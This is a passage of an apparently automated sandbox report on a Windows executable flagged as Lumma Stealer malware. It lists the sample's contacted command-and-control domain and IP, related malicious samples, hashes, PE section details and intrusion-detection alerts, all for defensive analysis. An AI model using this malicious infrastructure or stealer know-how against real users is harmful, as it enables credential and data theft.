                                        https://duckduckgo.com/ac/?q=P0SJULJxI0.exe, 00000000.00000003.1626718719.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626551778.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626630650.0000000005C5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://mindhandru.buzz/MPhP0SJULJxI0.exe, 00000000.00000003.2482482732.0000000005C21000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://mindhandru.buzz/steP0SJULJxI0.exe, 00000000.00000003.2520864101.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000002.2525190295.00000000014F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=P0SJULJxI0.exe, 00000000.00000003.1626718719.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626551778.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626630650.0000000005C5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYiP0SJULJxI0.exe, 00000000.00000003.2096545927.0000000005CA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://mindhandru.buzz/piP0SJULJxI0.exe, 00000000.00000003.2520864101.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000002.2525190295.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1625381463.000000000149B000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://mindhandru.buzz:443/apiP0SJULJxI0.exe, 00000000.00000003.2100181066.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2096219412.00000000014C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://mindhandru.buzz/pidP0SJULJxI0.exe, 00000000.00000003.2096219412.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2520864101.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000002.2525190295.00000000014F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://x1.c.lencr.org/0P0SJULJxI0.exe, 00000000.00000003.2067997842.000000000151D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://x1.i.lencr.org/0P0SJULJxI0.exe, 00000000.00000003.2067997842.000000000151D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchP0SJULJxI0.exe, 00000000.00000003.1626718719.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626551778.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626630650.0000000005C5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://support.mozilla.org/products/firefoxgro.allP0SJULJxI0.exe, 00000000.00000003.2068940488.0000000005D4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoP0SJULJxI0.exe, 00000000.00000003.1626718719.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626551778.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626630650.0000000005C5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://mindhandru.buzz/c)P0SJULJxI0.exe, 00000000.00000003.2067395256.00000000014F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://mindhandru.buzz/sP0SJULJxI0.exe, 00000000.00000003.2096219412.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2100181066.00000000014F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://mindhandru.buzz/P0SJULJxI0.exe, 00000000.00000003.1625381463.0000000001462000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2506947715.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1625381463.000000000149B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=P0SJULJxI0.exe, 00000000.00000003.1626718719.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626551778.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626630650.0000000005C5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://crl.rootca1.amazontrust.com/rootca1.crl0P0SJULJxI0.exe, 00000000.00000003.2067997842.000000000151D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://mindhandru.buzz/apiX/P0SJULJxI0.exe, 00000000.00000003.2481187488.0000000001462000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://mindhandru.buzz/W/P0SJULJxI0.exe, 00000000.00000003.2506445308.0000000001462000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2504979670.0000000001462000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://ocsp.rootca1.amazontrust.com0:P0SJULJxI0.exe, 00000000.00000003.2067997842.000000000151D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.P0SJULJxI0.exe, 00000000.00000003.2095692358.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2096545927.0000000005CA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.ecosia.org/newtab/P0SJULJxI0.exe, 00000000.00000003.1626718719.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626551778.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626630650.0000000005C5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brP0SJULJxI0.exe, 00000000.00000003.2068940488.0000000005D4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://mindhandru.buzz/dP0SJULJxI0.exe, 00000000.00000003.1625381463.000000000149B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44P0SJULJxI0.exe, 00000000.00000003.2095692358.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2096545927.0000000005CA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://mindhandru.buzz/apisP0SJULJxI0.exe, 00000000.00000002.2524940975.0000000001484000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://ac.ecosia.org/autocomplete?q=P0SJULJxI0.exe, 00000000.00000003.1626718719.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626551778.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626630650.0000000005C5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://mindhandru.buzz/;.CP0SJULJxI0.exe, 00000000.00000003.2520864101.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2506947715.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000002.2525190295.00000000014F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://mindhandru.buzz/api;P0SJULJxI0.exe, 00000000.00000003.2481187488.0000000001484000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          		unknown
                                                                          http://crl.microP0SJULJxI0.exe, 00000000.00000003.2067395256.00000000014C3000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2096219412.00000000014C3000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2505924911.00000000014CC000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2480422715.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2504533106.00000000014CC000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1625381463.000000000149B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgP0SJULJxI0.exe, 00000000.00000003.2095692358.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2096545927.0000000005CA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://crt.rootca1.amazontrust.com/rootca1.cer0?P0SJULJxI0.exe, 00000000.00000003.2067997842.000000000151D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&uP0SJULJxI0.exe, 00000000.00000003.2095692358.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2096545927.0000000005CA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&ctaP0SJULJxI0.exe, 00000000.00000003.2095692358.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2096545927.0000000005CA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgP0SJULJxI0.exe, 00000000.00000003.2095692358.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2096545927.0000000005CA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://mindhandru.buzz/apih&P0SJULJxI0.exe, 00000000.00000002.2524940975.0000000001462000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=P0SJULJxI0.exe, 00000000.00000003.1626718719.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626551778.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626630650.0000000005C5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high

                                                                                        World Map of Contacted IPs

                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs

                                                                                        Public IPs

                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        172.67.165.185
                                                                                        		mindhandru.buzzUnited States
                                                                                        		13335CLOUDFLARENETUSfalse

                                                                                        General Information

                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1580880
                                                                                        Start date and time:2024-12-26 12:48:07 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 6m 53s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:6
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:P0SJULJxI0.exe
                                                                                        renamed because original name is a hash value
                                                                                        Original Sample Name:e5d4e86f709d076fa5bd3e10007f487f.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.spyw.evad.winEXE@1/0@2/1
                                                                                        EGA Information:Failed
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        • Number of executed functions: 0
                                                                                        • Number of non-executed functions: 5
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                        • Execution Graph export aborted for target P0SJULJxI0.exe, PID 5272 because there are no executed function
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                        Simulations

                                                                                        Behavior and APIs

                                                                                        TimeTypeDescription
                                                                                        06:49:23API Interceptor2389752x Sleep call for process: P0SJULJxI0.exe modified

                                                                                        Joe Sandbox View / Context

                                                                                        IPs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        172.67.165.185r06aMlvVyM.exeGet hashmaliciousLummaCBrowse
                                                                                          i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                                                                            XM6cn2uNux.exeGet hashmaliciousLummaCBrowse
                                                                                              rwFNJ4pHWG.exeGet hashmaliciousLummaCBrowse
                                                                                                dEugughckk.exeGet hashmaliciousLummaCBrowse
                                                                                                  Solara-v3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                    https://click.jipolismall.de/i86/Get hashmaliciousUnknownBrowse
                                                                                                      https://ser.optimalesi.de/i87/Get hashmaliciousUnknownBrowse
                                                                                                        https://ser.optimalesi.de/i68Get hashmaliciousUnknownBrowse
                                                                                                          https://cpanel.vivatell.de/i105/Get hashmaliciousUnknownBrowse

                                                                                                            Domains

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            mindhandru.buzzr06aMlvVyM.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.165.185
                                                                                                            XM6cn2uNux.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.165.185
                                                                                                            ZX2M0AXZ56.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.11.101
                                                                                                            0Pm0sadcCP.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                            • 104.21.11.101
                                                                                                            TTsfmr1RWm.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.11.101
                                                                                                            COBYmpzi7q.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.11.101
                                                                                                            rwFNJ4pHWG.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.165.185
                                                                                                            lBsKTx65QC.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.11.101
                                                                                                            dEugughckk.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.165.185
                                                                                                            Solara-v3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.165.185

                                                                                                            ASNs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            CLOUDFLARENETUSC8QT9HkXEb.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.66.86
                                                                                                            r06aMlvVyM.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.165.185
                                                                                                            i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                                                                                            • 172.67.150.49
                                                                                                            XM6cn2uNux.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.165.185
                                                                                                            0hRSICdcGg.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.66.86
                                                                                                            ZX2M0AXZ56.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.11.101
                                                                                                            6GNqkkKY0j.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.157.254
                                                                                                            0Pm0sadcCP.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                            • 104.21.11.101
                                                                                                            TTsfmr1RWm.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.11.101
                                                                                                            COBYmpzi7q.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.11.101

                                                                                                            JA3 Fingerprints

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            a0e9f5d64349fb13191bc781f81f42e1C8QT9HkXEb.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.165.185
                                                                                                            r06aMlvVyM.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.165.185
                                                                                                            XM6cn2uNux.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.165.185
                                                                                                            0hRSICdcGg.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.165.185
                                                                                                            ZX2M0AXZ56.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.165.185
                                                                                                            6GNqkkKY0j.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.165.185
                                                                                                            0Pm0sadcCP.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                            • 172.67.165.185
                                                                                                            TTsfmr1RWm.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.165.185
                                                                                                            COBYmpzi7q.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.165.185
                                                                                                            rwFNJ4pHWG.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.165.185

                                                                                                            Dropped Files

                                                                                                            No context

                                                                                                            Created / dropped Files

                                                                                                            No created / dropped files found

                                                                                                            Static File Info

                                                                                                            General

                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Entropy (8bit):6.575682278114643
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                            File name:P0SJULJxI0.exe
                                                                                                            File size:2'954'240 bytes
                                                                                                            MD5:e5d4e86f709d076fa5bd3e10007f487f
                                                                                                            SHA1:a3b62c9255ed1c479cc5a01110d33d59f50bc383
                                                                                                            SHA256:774d9d60d5ef51a4ce1780aae20047a0cd00c45f25abd0cbba77028c5b752cf4
                                                                                                            SHA512:e83fecb0b657c5928656f00e55467c4e827f7229734feb87b0d77a00fc59228192f4bf0aa7a8432f56c7756ab66434a40f3c5d8831c523270d04710c4a47d98b
                                                                                                            SSDEEP:49152:z10K87R2Eaf+rjvTl+QgMUQ61X59lH8rPoD3M29Y4MJ0Ata:p0KY4Eaf+rrTMQ3UVX5/HSSMpa
                                                                                                            TLSH:FCD55B51A90572CFD8CE26788427CD426C1D03F8DB184ACB9CAC7C7ABDA7DC211B6E65
                                                                                                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig............................../...........@...........................0...........@.................................Y@..m..

                                                                                                            File Icon

                                                                                                            Icon Hash:00928e8e8686b000

                                                                                                            Static PE Info

                                                                                                            General

                                                                                                            Entrypoint:0x6fe000
                                                                                                            Entrypoint Section:.taggant
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:6
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:6
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:6
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                            Instruction
                                                                                                            jmp 00007FA94480340Ah
                                                                                                            pslld mm5, qword ptr [eax+eax]
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            jmp 00007FA944805405h
                                                                                                            add byte ptr [edx+ecx], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            xor byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax+eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [edx+ecx], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            or dword ptr [eax+00000000h], eax
                                                                                                            add byte ptr [eax], al
                                                                                                            adc byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add al, 0Ah
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x540590x6d.idata
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x541f80x8.idata
                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                            Sections

                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                            0x10000x520000x264002c98ae654f64e6c643cf40f0aa8156e2False0.9995212928921569data7.975723556996926IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .rsrc 0x530000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .idata 0x540000x10000x20039a711a7d804ccbc2a14eea65cf3c27eFalse0.154296875data1.0789976601211375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            nszjqukc0x550000x2a80000x2a760086cafc17af655f3070c7ab4ecd284ee7unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            kpouiknl0x2fd0000x10000x600fae3ea3e069c41399284db7ed88fa45aFalse0.5924479166666666data5.185452761620342IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .taggant0x2fe0000x30000x2200c2f9468feae118e26b430f72b9a5e4ebFalse0.06353400735294118DOS executable (COM)0.7032087179830366IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            DLLImport
                                                                                                            kernel32.dlllstrcpy

                                                                                                            Network Behavior

                                                                                                            Download Network PCAP: filteredfull

                                                                                                            Suricata IDS Alerts

                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2024-12-26T12:49:12.560680+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849704172.67.165.185443TCP
                                                                                                            2024-12-26T12:49:24.546737+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.849704172.67.165.185443TCP
